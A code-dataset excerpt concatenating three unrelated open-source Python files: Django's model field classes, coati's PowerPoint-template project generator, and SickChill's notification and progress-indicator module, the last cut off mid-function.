        )

    def get_db_prep_value(self, value, connection, prepared=False):
        # Native interval columns take the timedelta as-is; other backends
        # store an integer number of microseconds.
        if connection.features.has_native_duration_field:
            return value
        if value is None:
            return None
        # Discard any fractional microseconds due to floating point arithmetic.
        return int(round(value.total_seconds() * 1000000))

    def get_db_converters(self, connection):
        # Reverse of get_db_prep_value: convert stored microseconds back to a
        # timedelta on backends without a native duration type.
        converters = []
        if not connection.features.has_native_duration_field:
            converters.append(connection.ops.convert_durationfield_value)
        return converters + super(DurationField, self).get_db_converters(connection)

    def value_to_string(self, obj):
        # Serialization hook: "[DD] [HH:[MM:]]ss[.uuuuuu]" string, or '' for NULL.
        val = self.value_from_object(obj)
        return '' if val is None else duration_string(val)

    def formfield(self, **kwargs):
        defaults = {
            'form_class': forms.DurationField,
        }
        defaults.update(kwargs)
        return super(DurationField, self).formfield(**defaults)
class EmailField(CharField):
    """CharField that validates its content as an email address."""
    default_validators = [validators.validate_email]
    description = _("Email address")

    def __init__(self, *args, **kwargs):
        # max_length=254 to be compliant with RFCs 3696 and 5321
        kwargs.setdefault('max_length', 254)
        super(EmailField, self).__init__(*args, **kwargs)

    def deconstruct(self):
        name, path, args, kwargs = super(EmailField, self).deconstruct()
        # We do not exclude max_length if it matches default as we want to change
        # the default in future.
        return name, path, args, kwargs

    def formfield(self, **kwargs):
        # As with CharField, this will cause email validation to be performed
        # twice.
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('form_class', forms.EmailField)
        return super(EmailField, self).formfield(**form_kwargs)
class FilePathField(Field):
    """Stores a filesystem path chosen from the files/folders under ``path``."""
    description = _("File path")

    def __init__(self, verbose_name=None, name=None, path='', match=None,
                 recursive=False, allow_files=True, allow_folders=False, **kwargs):
        # path: directory to offer choices from; match: optional regex filter;
        # recursive: descend into subdirectories.
        self.path, self.match, self.recursive = path, match, recursive
        self.allow_files, self.allow_folders = allow_files, allow_folders
        kwargs['max_length'] = kwargs.get('max_length', 100)
        super(FilePathField, self).__init__(verbose_name, name, **kwargs)

    def check(self, **kwargs):
        errors = super(FilePathField, self).check(**kwargs)
        errors.extend(self._check_allowing_files_or_folders(**kwargs))
        return errors

    def _check_allowing_files_or_folders(self, **kwargs):
        # At least one of the two switches must be on, otherwise the field
        # could never offer any choice.
        if not self.allow_files and not self.allow_folders:
            return [
                checks.Error(
                    "FilePathFields must have either 'allow_files' or 'allow_folders' set to True.",
                    obj=self,
                    id='fields.E140',
                )
            ]
        return []

    def deconstruct(self):
        # Only serialize options that differ from their defaults so migration
        # output stays minimal.
        name, path, args, kwargs = super(FilePathField, self).deconstruct()
        if self.path != '':
            kwargs['path'] = self.path
        if self.match is not None:
            kwargs['match'] = self.match
        if self.recursive is not False:
            kwargs['recursive'] = self.recursive
        if self.allow_files is not True:
            kwargs['allow_files'] = self.allow_files
        if self.allow_folders is not False:
            kwargs['allow_folders'] = self.allow_folders
        if kwargs.get("max_length") == 100:
            del kwargs["max_length"]
        return name, path, args, kwargs

    def get_prep_value(self, value):
        value = super(FilePathField, self).get_prep_value(value)
        if value is None:
            return None
        return six.text_type(value)

    def formfield(self, **kwargs):
        defaults = {
            'path': self.path,
            'match': self.match,
            'recursive': self.recursive,
            'form_class': forms.FilePathField,
            'allow_files': self.allow_files,
            'allow_folders': self.allow_folders,
        }
        defaults.update(kwargs)
        return super(FilePathField, self).formfield(**defaults)

    def get_internal_type(self):
        return "FilePathField"
class FloatField(Field):
    """Stores a floating point number as a Python ``float``."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be a float."),
    }
    description = _("Floating point number")

    def get_internal_type(self):
        return "FloatField"

    def get_prep_value(self, value):
        value = super(FloatField, self).get_prep_value(value)
        # NULL passes through; everything else is coerced to float.
        return None if value is None else float(value)

    def to_python(self, value):
        """Coerce *value* to float, raising ValidationError on failure."""
        if value is None:
            return value
        try:
            return float(value)
        except (TypeError, ValueError):
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
                params={'value': value},
            )

    def formfield(self, **kwargs):
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('form_class', forms.FloatField)
        return super(FloatField, self).formfield(**form_kwargs)
class IntegerField(Field):
    """Stores a standard integer."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be an integer."),
    }
    description = _("Integer")

    def check(self, **kwargs):
        errors = super(IntegerField, self).check(**kwargs)
        errors.extend(self._check_max_length_warning())
        return errors

    def _check_max_length_warning(self):
        # max_length has no effect on integer columns; warn so the user
        # removes the dead option.
        if self.max_length is not None:
            return [
                checks.Warning(
                    "'max_length' is ignored when used with IntegerField",
                    hint="Remove 'max_length' from field",
                    obj=self,
                    id='fields.W122',
                )
            ]
        return []

    @cached_property
    def validators(self):
        # These validators can't be added at field initialization time since
        # they're based on values retrieved from `connection`.
        validators_ = super(IntegerField, self).validators
        internal_type = self.get_internal_type()
        min_value, max_value = connection.ops.integer_field_range(internal_type)
        if min_value is not None:
            # Skip adding a range validator when an at-least-as-strict
            # user-supplied one already exists.
            for validator in validators_:
                if isinstance(validator, validators.MinValueValidator) and validator.limit_value >= min_value:
                    break
            else:
                validators_.append(validators.MinValueValidator(min_value))
        if max_value is not None:
            for validator in validators_:
                if isinstance(validator, validators.MaxValueValidator) and validator.limit_value <= max_value:
                    break
            else:
                validators_.append(validators.MaxValueValidator(max_value))
        return validators_

    def get_prep_value(self, value):
        value = super(IntegerField, self).get_prep_value(value)
        if value is None:
            return None
        return int(value)

    def get_internal_type(self):
        return "IntegerField"

    def to_python(self, value):
        """Coerce *value* to int, raising ValidationError on failure."""
        if value is None:
            return value
        try:
            return int(value)
        except (TypeError, ValueError):
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
                params={'value': value},
            )

    def formfield(self, **kwargs):
        defaults = {'form_class': forms.IntegerField}
        defaults.update(kwargs)
        return super(IntegerField, self).formfield(**defaults)
class BigIntegerField(IntegerField):
    """IntegerField backed by a 64-bit (8 byte) integer column."""
    empty_strings_allowed = False
    description = _("Big (8 byte) integer")
    # Largest value representable in a signed 64-bit integer.
    MAX_BIGINT = 9223372036854775807

    def get_internal_type(self):
        return "BigIntegerField"

    def formfield(self, **kwargs):
        # Bound the form field to the signed 64-bit range unless the caller
        # supplied tighter bounds.
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('min_value', -BigIntegerField.MAX_BIGINT - 1)
        form_kwargs.setdefault('max_value', BigIntegerField.MAX_BIGINT)
        return super(BigIntegerField, self).formfield(**form_kwargs)
class IPAddressField(Field):
    """Legacy IPv4 field; removed from public use, kept for old migrations."""
    empty_strings_allowed = False
    description = _("IPv4 address")
    # Marks the field as removed for the system-check framework.
    system_check_removed_details = {
        'msg': (
            'IPAddressField has been removed except for support in '
            'historical migrations.'
        ),
        'hint': 'Use GenericIPAddressField instead.',
        'id': 'fields.E900',
    }

    def __init__(self, *args, **kwargs):
        # 15 chars = "255.255.255.255", the longest dotted-quad IPv4 string.
        kwargs['max_length'] = 15
        super(IPAddressField, self).__init__(*args, **kwargs)

    def deconstruct(self):
        # max_length is forced in __init__, so never serialize it.
        name, path, args, kwargs = super(IPAddressField, self).deconstruct()
        del kwargs['max_length']
        return name, path, args, kwargs

    def get_prep_value(self, value):
        value = super(IPAddressField, self).get_prep_value(value)
        if value is None:
            return None
        return six.text_type(value)

    def get_internal_type(self):
        return "IPAddressField"
class GenericIPAddressField(Field):
    """Stores an IPv4 or IPv6 address, selectable via ``protocol``."""
    empty_strings_allowed = False
    description = _("IP address")
    default_error_messages = {}

    def __init__(self, verbose_name=None, name=None, protocol='both',
                 unpack_ipv4=False, *args, **kwargs):
        # protocol: 'both', 'IPv4' or 'IPv6'; unpack_ipv4 converts mapped
        # addresses like ::ffff:192.0.2.1 to their IPv4 form.
        self.unpack_ipv4 = unpack_ipv4
        self.protocol = protocol
        self.default_validators, invalid_error_message = \
            validators.ip_address_validators(protocol, unpack_ipv4)
        # NOTE(review): this assigns into the class-level default_error_messages
        # dict (shared across instances) before super().__init__ merges the
        # error messages -- appears intentional upstream, but verify.
        self.default_error_messages['invalid'] = invalid_error_message
        # 39 chars fits the longest uncompressed IPv6 representation.
        kwargs['max_length'] = 39
        super(GenericIPAddressField, self).__init__(verbose_name, name, *args,
                                                    **kwargs)

    def check(self, **kwargs):
        errors = super(GenericIPAddressField, self).check(**kwargs)
        errors.extend(self._check_blank_and_null_values(**kwargs))
        return errors

    def _check_blank_and_null_values(self, **kwargs):
        # blank=True without null=True would try to store '' in a column that
        # only accepts addresses or NULL.
        if not getattr(self, 'null', False) and getattr(self, 'blank', False):
            return [
                checks.Error(
                    'GenericIPAddressFields cannot have blank=True if null=False, '
                    'as blank values are stored as nulls.',
                    obj=self,
                    id='fields.E150',
                )
            ]
        return []

    def deconstruct(self):
        # Only serialize non-default options; drop the forced max_length.
        name, path, args, kwargs = super(GenericIPAddressField, self).deconstruct()
        if self.unpack_ipv4 is not False:
            kwargs['unpack_ipv4'] = self.unpack_ipv4
        if self.protocol != "both":
            kwargs['protocol'] = self.protocol
        if kwargs.get("max_length") == 39:
            del kwargs['max_length']
        return name, path, args, kwargs

    def get_internal_type(self):
        return "GenericIPAddressField"

    def to_python(self, value):
        """Normalize to text; IPv6 values are cleaned/validated."""
        if value is None:
            return None
        if not isinstance(value, six.string_types):
            value = force_text(value)
        value = value.strip()
        if ':' in value:
            # Presence of ':' marks an IPv6 address.
            return clean_ipv6_address(value, self.unpack_ipv4, self.error_messages['invalid'])
        return value

    def get_db_prep_value(self, value, connection, prepared=False):
        if not prepared:
            value = self.get_prep_value(value)
        return connection.ops.adapt_ipaddressfield_value(value)

    def get_prep_value(self, value):
        value = super(GenericIPAddressField, self).get_prep_value(value)
        if value is None:
            return None
        if value and ':' in value:
            # Best-effort IPv6 normalization; invalid input is passed through
            # so validation can report it later.
            try:
                return clean_ipv6_address(value, self.unpack_ipv4)
            except exceptions.ValidationError:
                pass
        return six.text_type(value)

    def formfield(self, **kwargs):
        defaults = {
            'protocol': self.protocol,
            'form_class': forms.GenericIPAddressField,
        }
        defaults.update(kwargs)
        return super(GenericIPAddressField, self).formfield(**defaults)
class NullBooleanField(Field):
    """Boolean field that also admits ``None`` (stored as NULL)."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be either None, True or False."),
    }
    description = _("Boolean (Either True, False or None)")

    def __init__(self, *args, **kwargs):
        # NULL-ability is the whole point of this field type, so force it on.
        kwargs.update(null=True, blank=True)
        super(NullBooleanField, self).__init__(*args, **kwargs)

    def deconstruct(self):
        name, path, args, kwargs = super(NullBooleanField, self).deconstruct()
        # null/blank are hard-wired in __init__, so they never need serializing.
        for forced_option in ('null', 'blank'):
            del kwargs[forced_option]
        return name, path, args, kwargs

    def get_internal_type(self):
        return "NullBooleanField"

    def to_python(self, value):
        """Coerce *value* to True/False/None; reject anything else."""
        if value is None:
            return None
        if value in (True, False):
            # Also catches ints 0/1, since 0 == False and 1 == True.
            return bool(value)
        recognized = {
            'None': None,
            't': True, 'True': True, '1': True,
            'f': False, 'False': False, '0': False,
        }
        try:
            return recognized[value]
        except (KeyError, TypeError):
            # TypeError covers unhashable inputs such as lists.
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
                params={'value': value},
            )

    def get_prep_value(self, value):
        value = super(NullBooleanField, self).get_prep_value(value)
        return None if value is None else self.to_python(value)

    def formfield(self, **kwargs):
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('form_class', forms.NullBooleanField)
        return super(NullBooleanField, self).formfield(**form_kwargs)
class PositiveIntegerRelDbTypeMixin(object):
    """Mixin giving positive-integer fields the correct related column type."""

    def rel_db_type(self, connection):
        """
        Return the data type that a related field pointing to this field should
        use. In most cases, a foreign key pointing to a positive integer
        primary key will have an integer column data type but some databases
        (e.g. MySQL) have an unsigned integer type. In that case
        (related_fields_match_type=True), the primary key should return its
        db_type.
        """
        if not connection.features.related_fields_match_type:
            # Plain signed integer column for the foreign key.
            return IntegerField().db_type(connection=connection)
        return self.db_type(connection)
class PositiveIntegerField(PositiveIntegerRelDbTypeMixin, IntegerField):
    """IntegerField restricted (at form level) to non-negative values."""
    description = _("Positive integer")

    def get_internal_type(self):
        return "PositiveIntegerField"

    def formfield(self, **kwargs):
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('min_value', 0)
        return super(PositiveIntegerField, self).formfield(**form_kwargs)
class PositiveSmallIntegerField(PositiveIntegerRelDbTypeMixin, IntegerField):
    """Small-integer field restricted (at form level) to non-negative values."""
    description = _("Positive small integer")

    def get_internal_type(self):
        return "PositiveSmallIntegerField"

    def formfield(self, **kwargs):
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('min_value', 0)
        return super(PositiveSmallIntegerField, self).formfield(**form_kwargs)
class SlugField(CharField):
    """CharField validated as a slug (letters, numbers, hyphens, underscores)."""
    default_validators = [validators.validate_slug]
    description = _("Slug (up to %(max_length)s)")

    def __init__(self, *args, **kwargs):
        kwargs['max_length'] = kwargs.get('max_length', 50)
        # Set db_index=True unless it's been set manually.
        if 'db_index' not in kwargs:
            kwargs['db_index'] = True
        # allow_unicode switches to the unicode-aware slug validator.
        self.allow_unicode = kwargs.pop('allow_unicode', False)
        if self.allow_unicode:
            self.default_validators = [validators.validate_unicode_slug]
        super(SlugField, self).__init__(*args, **kwargs)

    def deconstruct(self):
        # Only serialize options that differ from this field's defaults
        # (note: db_index defaults to True here, unlike most fields).
        name, path, args, kwargs = super(SlugField, self).deconstruct()
        if kwargs.get("max_length") == 50:
            del kwargs['max_length']
        if self.db_index is False:
            kwargs['db_index'] = False
        else:
            del kwargs['db_index']
        if self.allow_unicode is not False:
            kwargs['allow_unicode'] = self.allow_unicode
        return name, path, args, kwargs

    def get_internal_type(self):
        return "SlugField"

    def formfield(self, **kwargs):
        defaults = {'form_class': forms.SlugField, 'allow_unicode': self.allow_unicode}
        defaults.update(kwargs)
        return super(SlugField, self).formfield(**defaults)
class SmallIntegerField(IntegerField):
    """IntegerField stored in a small (backend-dependent) integer column."""
    description = _("Small integer")

    def get_internal_type(self):
        return "SmallIntegerField"
class TextField(Field):
    """Stores arbitrarily long text."""
    description = _("Text")

    def get_internal_type(self):
        return "TextField"

    def to_python(self, value):
        # Strings and NULL pass through; anything else is coerced to text.
        if value is None or isinstance(value, six.string_types):
            return value
        return force_text(value)

    def get_prep_value(self, value):
        return self.to_python(super(TextField, self).get_prep_value(value))

    def formfield(self, **kwargs):
        # Passing max_length to forms.CharField means that the value's length
        # will be validated twice. This is considered acceptable since we want
        # the value in the form field (to pass into widget for example).
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('max_length', self.max_length)
        form_kwargs.setdefault('widget', forms.Textarea)
        return super(TextField, self).formfield(**form_kwargs)
class TimeField(DateTimeCheckMixin, Field):
    """Stores a time of day; maps to ``datetime.time``."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value has an invalid format. It must be in "
                     "HH:MM[:ss[.uuuuuu]] format."),
        'invalid_time': _("'%(value)s' value has the correct format "
                          "(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."),
    }
    description = _("Time")

    def __init__(self, verbose_name=None, name=None, auto_now=False,
                 auto_now_add=False, **kwargs):
        # auto_now: stamp on every save; auto_now_add: stamp only on creation.
        self.auto_now, self.auto_now_add = auto_now, auto_now_add
        if auto_now or auto_now_add:
            # Auto-managed values are not user-editable.
            kwargs['editable'] = False
            kwargs['blank'] = True
        super(TimeField, self).__init__(verbose_name, name, **kwargs)

    def _check_fix_default_value(self):
        """
        Adds a warning to the checks framework stating, that using an actual
        time or datetime value is probably wrong; it's only being evaluated on
        server start-up.

        For details see ticket #21905
        """
        if not self.has_default():
            return []
        # Compare in naive UTC so aware and naive defaults are comparable.
        now = timezone.now()
        if not timezone.is_naive(now):
            now = timezone.make_naive(now, timezone.utc)
        value = self.default
        if isinstance(value, datetime.datetime):
            second_offset = datetime.timedelta(seconds=10)
            lower = now - second_offset
            upper = now + second_offset
            if timezone.is_aware(value):
                value = timezone.make_naive(value, timezone.utc)
        elif isinstance(value, datetime.time):
            second_offset = datetime.timedelta(seconds=10)
            lower = now - second_offset
            upper = now + second_offset
            # Lift the bare time onto today's date so it can be compared.
            value = datetime.datetime.combine(now.date(), value)
            if timezone.is_aware(value):
                value = timezone.make_naive(value, timezone.utc).time()
        else:
            # No explicit time / datetime value -- no checks necessary
            return []
        if lower <= value <= upper:
            return [
                checks.Warning(
                    'Fixed default value provided.',
                    hint='It seems you set a fixed date / time / datetime '
                         'value as default for this field. This may not be '
                         'what you want. If you want to have the current date '
                         'as default, use `django.utils.timezone.now`',
                    obj=self,
                    id='fields.W161',
                )
            ]
        return []

    def deconstruct(self):
        # Serialize auto_now/auto_now_add when set; drop the blank/editable
        # values they forced in __init__.
        name, path, args, kwargs = super(TimeField, self).deconstruct()
        if self.auto_now is not False:
            kwargs["auto_now"] = self.auto_now
        if self.auto_now_add is not False:
            kwargs["auto_now_add"] = self.auto_now_add
        if self.auto_now or self.auto_now_add:
            del kwargs['blank']
            del kwargs['editable']
        return name, path, args, kwargs

    def get_internal_type(self):
        return "TimeField"

    def to_python(self, value):
        """Convert *value* to ``datetime.time`` or raise ValidationError."""
        if value is None:
            return None
        if isinstance(value, datetime.time):
            return value
        if isinstance(value, datetime.datetime):
            # Not usually a good idea to pass in a datetime here (it loses
            # information), but this can be a side-effect of interacting with a
            # database backend (e.g. Oracle), so we'll be accommodating.
            return value.time()
        try:
            parsed = parse_time(value)
            if parsed is not None:
                return parsed
        except ValueError:
            raise exceptions.ValidationError(
                self.error_messages['invalid_time'],
                code='invalid_time',
                params={'value': value},
            )
        raise exceptions.ValidationError(
            self.error_messages['invalid'],
            code='invalid',
            params={'value': value},
        )

    def pre_save(self, model_instance, add):
        # auto_now / auto_now_add stamp the instance with the current time.
        if self.auto_now or (self.auto_now_add and add):
            value = datetime.datetime.now().time()
            setattr(model_instance, self.attname, value)
            return value
        else:
            return super(TimeField, self).pre_save(model_instance, add)

    def get_prep_value(self, value):
        value = super(TimeField, self).get_prep_value(value)
        return self.to_python(value)

    def get_db_prep_value(self, value, connection, prepared=False):
        # Casts times into the format expected by the backend
        if not prepared:
            value = self.get_prep_value(value)
        return connection.ops.adapt_timefield_value(value)

    def value_to_string(self, obj):
        # Serialization hook: ISO 8601 time string, or '' for NULL.
        val = self.value_from_object(obj)
        return '' if val is None else val.isoformat()

    def formfield(self, **kwargs):
        defaults = {'form_class': forms.TimeField}
        defaults.update(kwargs)
        return super(TimeField, self).formfield(**defaults)
class URLField(CharField):
    """CharField that validates its content as a URL."""
    default_validators = [validators.URLValidator()]
    description = _("URL")

    def __init__(self, verbose_name=None, name=None, **kwargs):
        kwargs.setdefault('max_length', 200)
        super(URLField, self).__init__(verbose_name, name, **kwargs)

    def deconstruct(self):
        name, path, args, kwargs = super(URLField, self).deconstruct()
        # Omit max_length from migrations while it still equals the default.
        if kwargs.get("max_length") == 200:
            del kwargs['max_length']
        return name, path, args, kwargs

    def formfield(self, **kwargs):
        # As with CharField, this will cause URL validation to be performed
        # twice.
        form_kwargs = dict(kwargs)
        form_kwargs.setdefault('form_class', forms.URLField)
        return super(URLField, self).formfield(**form_kwargs)
class BinaryField(Field):
    """Stores raw binary data; never editable through forms."""
    description = _("Raw binary data")
    empty_values = [None, b'']

    def __init__(self, *args, **kwargs):
        # Binary blobs cannot be edited via forms, so force editable off.
        kwargs['editable'] = False
        super(BinaryField, self).__init__(*args, **kwargs)
        if self.max_length is not None:
            self.validators.append(validators.MaxLengthValidator(self.max_length))

    def deconstruct(self):
        # editable is forced in __init__, so never serialize it.
        name, path, args, kwargs = super(BinaryField, self).deconstruct()
        del kwargs['editable']
        return name, path, args, kwargs

    def get_internal_type(self):
        return "BinaryField"

    def get_placeholder(self, value, compiler, connection):
        return connection.ops.binary_placeholder_sql(value)

    def get_default(self):
        if self.has_default() and not callable(self.default):
            return self.default
        default = super(BinaryField, self).get_default()
        if default == '':
            # Normalize the generic text empty-string default to empty bytes.
            return b''
        return default

    def get_db_prep_value(self, value, connection, prepared=False):
        value = super(BinaryField, self).get_db_prep_value(value, connection, prepared)
        if value is not None:
            # Wrap in the DB driver's binary type so it isn't treated as text.
            return connection.Database.Binary(value)
        return value

    def value_to_string(self, obj):
        """Binary data is serialized as base64"""
        return b64encode(force_bytes(self.value_from_object(obj))).decode('ascii')

    def to_python(self, value):
        # If it's a string, it should be base64-encoded data
        if isinstance(value, six.text_type):
            return six.memoryview(b64decode(force_bytes(value)))
        return value
class UUIDField(Field):
    """Stores a ``uuid.UUID``; native uuid column where supported, else char(32)."""
    default_error_messages = {
        'invalid': _("'%(value)s' is not a valid UUID."),
    }
    description = 'Universally unique identifier'
    empty_strings_allowed = False

    def __init__(self, verbose_name=None, **kwargs):
        # 32 chars = the hex representation without dashes.
        kwargs['max_length'] = 32
        super(UUIDField, self).__init__(verbose_name, **kwargs)

    def deconstruct(self):
        # max_length is forced in __init__, so never serialize it.
        name, path, args, kwargs = super(UUIDField, self).deconstruct()
        del kwargs['max_length']
        return name, path, args, kwargs

    def get_internal_type(self):
        return "UUIDField"

    def get_db_prep_value(self, value, connection, prepared=False):
        if value is None:
            return None
        if not isinstance(value, uuid.UUID):
            value = self.to_python(value)
        if connection.features.has_native_uuid_field:
            # Backend stores real UUIDs; hand over the object unchanged.
            return value
        # Otherwise store the dash-less 32-char hex form.
        return value.hex

    def to_python(self, value):
        """Convert *value* to ``uuid.UUID`` or raise ValidationError."""
        if value is not None and not isinstance(value, uuid.UUID):
            try:
                return uuid.UUID(value)
            except (AttributeError, ValueError):
                # AttributeError covers non-string inputs (no .replace()).
                raise exceptions.ValidationError(
                    self.error_messages['invalid'],
                    code='invalid',
                    params={'value': value},
                )
        return value

    def formfield(self, **kwargs):
        defaults = {
            'form_class': forms.UUIDField,
        }
        defaults.update(kwargs)
        return super(UUIDField, self).formfield(**defaults)
| SantosDevelopers/sborganicos | venv/lib/python3.5/site-packages/django/db/models/fields/__init__.py | Python | mit | 88,153 |
from coati.powerpoint import open_pptx, runpowerpoint
import os
import sys
import logging
from shutil import copyfile
from colorlog import ColoredFormatter
# Logging configuration: colourised, timestamped output for the generator CLI.
LOG_LEVEL = logging.DEBUG
LOGFORMAT = "%(asctime)s - %(log_color)s%(message)s"
logging.root.setLevel(LOG_LEVEL)
formatter = ColoredFormatter(LOGFORMAT)
stream = logging.StreamHandler()
stream.setLevel(LOG_LEVEL)
stream.setFormatter(formatter)
log = logging.getLogger('pythonConfig')
log.setLevel(LOG_LEVEL)
log.addHandler(stream)

# Template files shipped with the package, resolved relative to this module.
this_dir = os.path.dirname(__file__)
template_path = os.path.join(this_dir, 'templates/slide_template.txt')
config_template_path = os.path.join(this_dir, 'templates/config_template.txt')
init_template_path = os.path.join(this_dir, 'templates/init_template.txt')
def _get_slides_shapes(ppt_path):
    """Open the presentation at *ppt_path* and return a list with one dict per
    slide, mapping each shape name to an empty tuple placeholder.

    Launches (and quits) a PowerPoint COM instance, so PowerPoint must be
    installed on the machine.
    """
    pptapp = runpowerpoint()
    pptFile = open_pptx(pptapp, ppt_path)
    log.debug('Open Template successfully...')
    all_slide_shapes = []
    for slide in pptFile.Slides:
        shapes_in_slide = _get_shapes_in_slide(slide)
        all_slide_shapes.append(shapes_in_slide)
    # Release the COM objects: close the document before quitting the app.
    pptFile.close()
    pptapp.Quit()
    log.debug('Finish reading template...')
    return all_slide_shapes
def _get_shapes_in_slide(slide):
shapes_in_slide = {each_shape.name: () for each_shape in slide.shapes}
return shapes_in_slide
def _generate_path(p):
if not os.path.exists(os.path.dirname(p)):
try:
os.makedirs(os.path.dirname(p))
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
def _cp(src, dst, fn):
source = open(src, 'r')
result = fn(source.read())
destination = open(dst, 'w')
destination.write(result)
source.close
destination.close
def _insert_code(complete_text, text_to_insert, text_to_replace):
ans = complete_text.replace(text_to_replace, text_to_insert)
return ans
def _file_exists(ppt_path):
if not (ppt_path.endswith('.pptx') or ppt_path.endswith('.ppt')):
sys.exit('The file provided is not a PPT file')
elif not os.path.isfile(ppt_path):
sys.exit('The PPT file provided doesnt exist or is damaged')
pass
def generate(project_name, ppt_path):
    """Scaffold a new coati project named *project_name* from the PowerPoint
    template at *ppt_path*.

    Creates builders/slide<N>.py for every slide in the template, a config.py
    wiring all slides together, an empty builders/__init__.py, an images/
    folder, and a copy of the original .pptx. Exits the process when
    *ppt_path* is not an existing .ppt/.pptx file.
    """
    _file_exists(ppt_path)
    path = os.path.abspath(project_name)
    # Indentation used when pretty-printing the generated literals.
    spaces = " " * 12
    slide_tuples = '['
    #Generate builders/ folder prior slides creation
    path_builders = os.path.join(path, 'builders/')
    _generate_path(path_builders)
    log.info('create folder %s', "./builders/")
    for i, slide in enumerate(_get_slides_shapes(ppt_path)):
        slide_name = 'slide' + str(i+1)
        filename = path_builders + slide_name + '.py';
        #Create slide#.py with the template info
        _cp(template_path, filename, lambda source: _insert_code(
            source,
            str(slide).replace(", ",",\n" + spaces),
            '"_-{}-_"'))
        log.info('create %s', filename)
        #This line is in the for loop cause is gathering info for the config.py
        slide_tuples += ('\n' + spaces if i != 0 else '') + '(' + str(i+1) + ', ' + slide_name + '.build()),'
    #Generate config.py with already gathered info in slide_tuples
    # slide_tuples[:-1] drops the trailing comma before closing the list.
    config_filename = path + '/config.py'
    _cp(config_template_path, config_filename, lambda source: _insert_code(
        source,
        (slide_tuples[:-1] + ']'),
        '"_-{}-_"'))
    log.info('create %s', config_filename)
    #Create __init__ in builders
    init_file = path + '/builders/__init__.py'
    copyfile(init_template_path, init_file)
    log.info('create %s', init_file)
    #Copy original template file
    # NOTE(review): _cp reads/writes in text mode; copying a binary .pptx this
    # way may corrupt it on some platforms -- consider shutil.copyfile here.
    copy_ppt = path + '/' + str(os.path.split(ppt_path)[-1])
    _cp(ppt_path, copy_ppt , lambda source: source)
    log.info('copy %s', copy_ppt)
    #Add images folder
    _generate_path(os.path.join(path, 'images/'))
    log.info('create folder %s', "./images/")
| Intelimetrica/coati | coati/generator.py | Python | mit | 3,847 |
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickchill.github.io
#
# This file is part of SickChill.
#
# SickChill is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickChill is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickChill. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, print_function, unicode_literals
# Stdlib Imports
import datetime
# First Party Imports
import sickbeard
MESSAGE = 'notice'
ERROR = 'error'
class Notifications(object):
    """
    Queue of Notification objects awaiting delivery to clients.

    Regular messages and errors are kept in separate internal lists; both
    are drained together by get_notifications().
    """

    def __init__(self):
        # Pending regular notifications and pending error notifications.
        self._messages = []
        self._errors = []

    def message(self, title, message=''):
        """
        Queue a regular notification

        title: The title of the notification
        message: The message portion of the notification
        """
        notification = Notification(title, message, MESSAGE)
        self._messages.append(notification)

    def error(self, title, message=''):
        """
        Queue an error notification

        title: The title of the notification
        message: The message portion of the notification
        """
        notification = Notification(title, message, ERROR)
        self._errors.append(notification)

    def get_notifications(self, remote_ip='127.0.0.1'):
        """
        Return every notification not yet shown to remote_ip, marking each
        one as seen. Expired notifications are dropped from the queue first.

        Returns: A list of Notification objects
        """
        # Drop anything that has outlived its timeout.
        self._errors = [n for n in self._errors if not n.is_expired()]
        self._messages = [n for n in self._messages if not n.is_expired()]

        # Errors first, then messages -- only those this client hasn't seen.
        pending = self._errors + self._messages
        return [n.see(remote_ip) for n in pending if n.is_new(remote_ip)]
# static notification queue object
notifications = Notifications()
class Notification(object):
    """
    A single notification. Tracks its own creation time, timeout, and the
    list of client IPs that have already seen it.
    """

    def __init__(self, title, message='', type=None, timeout=None):
        self.title = title
        self.message = message

        # Creation time; used for expiry checks.
        self._when = datetime.datetime.now()
        # IP addresses this notification has been delivered to.
        self._seen = []

        # Default to a regular message and a one-minute lifetime.
        self.type = type if type else MESSAGE
        self._timeout = timeout if timeout else datetime.timedelta(minutes=1)

    def is_new(self, remote_ip='127.0.0.1'):
        """
        Returns True if this client (aka IP address) has not seen it yet.
        """
        return remote_ip not in self._seen

    def is_expired(self):
        """
        Returns True once the notification is older than its timeout.
        """
        age = datetime.datetime.now() - self._when
        return age > self._timeout

    def see(self, remote_ip='127.0.0.1'):
        """
        Marks this notification as seen by remote_ip and returns it.
        """
        self._seen.append(remote_ip)
        return self
class ProgressIndicator(object):
    """Simple progress state: a completion percentage plus a status dict."""

    def __init__(self, percentComplete=0, currentStatus=None):
        self.percentComplete = percentComplete
        # Any falsy status (None, {}) falls back to an empty title.
        if not currentStatus:
            currentStatus = {'title': ''}
        self.currentStatus = currentStatus
class ProgressIndicators(object):
    """Registry of named lists of progress indicators shown by the UI."""

    _pi = {'massUpdate': [],
           'massAdd': [],
           'dailyUpdate': []
           }

    @staticmethod
    def getIndicator(name):
        """
        Return the list of indicators registered under name, pruning any
        that are finished (100% complete). Unknown names yield [].
        """
        if name not in ProgressIndicators._pi:
            return []

        # Rebuild the list instead of calling remove() while iterating it:
        # mutating a list during iteration skips elements, so back-to-back
        # finished indicators were not all removed by the previous code.
        ProgressIndicators._pi[name] = [
            curPI for curPI in ProgressIndicators._pi[name]
            if curPI is None or curPI.percentComplete() != 100]

        # return the list of progress indicators associated with this name
